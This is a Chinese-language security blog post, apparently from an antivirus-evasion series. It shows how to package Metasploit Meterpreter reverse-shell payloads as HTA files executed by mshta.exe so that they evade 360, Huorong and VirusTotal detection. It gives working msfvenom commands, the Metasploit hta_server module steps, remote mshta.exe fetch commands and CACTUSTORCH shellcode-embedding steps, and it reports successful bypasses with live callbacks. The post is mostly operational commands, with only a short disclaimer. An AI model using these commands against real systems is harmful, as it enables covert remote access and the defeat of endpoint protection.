声明：文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途以及盈利等目的，否则后果自行承担！

额，这篇之前忘了推送了。。补一下。。

文章打包下载及相关软件下载：https://github.com/TideSec/BypassAntiVirus

几点说明：

1、上表中标识 √ 说明相应杀毒软件未检测出病毒，也就是代表了Bypass。

2、为了更好的对比效果，大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。

3、由于本机测试时只是安装了360全家桶和火绒，所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2020.01.01)，火绒版本5.0.34.16(2020.01.01)，360安全卫士12.0.0.2002(2020.01.01)。

4、其他杀软的检测指标是在virustotal.com（简称VT）上在线查杀，所以可能只是代表了静态查杀能力，数据仅供参考，不足以作为免杀或杀软查杀能力的判断指标。

5、完全不必要苛求一种免杀技术能bypass所有杀软，这样的技术肯定是有的，只是没被公开，一旦公开第二天就能被杀了，其实我们只要能bypass目标主机上的杀软就足够了。

Mshta.exe是微软Windows操作系统相关程序，英文全称Microsoft HTML Application，可翻译为微软超文本标记语言应用，用于执行.HTA文件。

目前正常的hta文件用到的很少，偶尔见到了很可能就是恶意软件，很多免杀工具都是对shellcode进行处理后生产.hta文件，在windows下可以直接执行。

之前工具篇里多个工具都可以生成hta后门：

Venom：https://mp.weixin.qq.com/s/CbfxupSWEPB86tBZsmxNCQ

Unicorn：https://mp.weixin.qq.com/s/y7P6bvHRFes854EAHAPOzw

ASWCrypter：https://mp.weixin.qq.com/s/tT1i55swRWIYiEdxEWElSQ

GreatSCT：https://mp.weixin.qq.com/s/s9DFRIgpvpE-_MneO0B_FQ

SharpShooter：https://mp.weixin.qq.com/s/EyvGfWXLbxkHe7liaNFhGg

CACTUSTORCH：https://mp.weixin.qq.com/s/g0CYvFMsrV7bHIfTnSUJBw

Evasion：https://mp.weixin.qq.com/s/YnnCM7W20xScv52k_ubxYQ

总体来看hta的免杀效果比较一般，其中专题18中的ASWCrypter算是稍微好一些的，主要是使用python对shellocde进行混淆，然后嵌入在hta中进行执行。我这里就不再介绍ASWCrypter，介绍几种其他的hta生成方法。

先试下msfvenom生成的原始的hta文件的查杀率

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -f hta-psh -o test5.hta

virustotal.com上查杀率为28/56

Metasploit中包含了一个"HTA Web Server"模块，可直接生产hta文件，并提供了web分发功能，使用比较方便。

使用msf生成一个hta文件

use exploit/windows/misc/hta_servermsf exploit(windows/misc/hta_server) > set srvhost 10.211.55.2msf exploit(windows/misc/hta_server) > set lhost 10.211.55.2msf exploit(windows/misc/hta_server) > exploit

在测试机执行命令，360和火绒都会查杀。

mshta.exe http://10.211.55.2:8080/0Cv7XgxLzSvN.hta

virustotal.com中shell.exe文件28/58个报病毒

先下载代码模板wget https://raw.githubusercontent.com/mdsecactivebreach/CACTUSTORCH/master/CACTUSTORCH.hta

1、首先要选择一个待注入的exe文件，默认是rundll32.exe, 你也可以使用notepad.exe, calc.exe等，在CACTUSTORCH.hta文件中直接修改就行。

2、使用 Cobalt Strike或Metasploit生成一个32位的shellcode

msfvenom -a x86 -p windows/meterpreter/reverse_https LHOST=10.211.55.2 LPORT=3333 -f raw -o payload.bin

3、执行下面命令cat payload.bin | base64 -w 0

4、把生成的base64编码后的代码复制到CACTUSTORCH.hta文件中的Dim code : code =。

5、在测试机中执行mshta.exe http://10.211.55.2/CACTUSTORCH.hta

360和火绒都免杀，都可正常上线

msf中监听windows/meterpreter/reverse_https可正常上线

virustotal.com上查杀率为26/58，这个查杀率还是挺高的。

使用mshta.exe绕过应用程序白名单（多种方法）:https://www.cnblogs.com/backlion/p/10491616.html

基于白名单Mshta.exe执行:https://micro8.gitbook.io/micro8/contents-1/71-80/75-ji-yu-bai-ming-dan-mshta.exe-zhi-hang-payload-di-wu-ji

使用Meterpreter的多种姿势:https://wh0ale.github.io/2019/01/05/2019-1-4-%E4%BD%BF%E7%94%A8Meterpreter%E7%9A%84%E5%A4%9A%E7%A7%8D%E5%A7%BF%E5%8A%BF/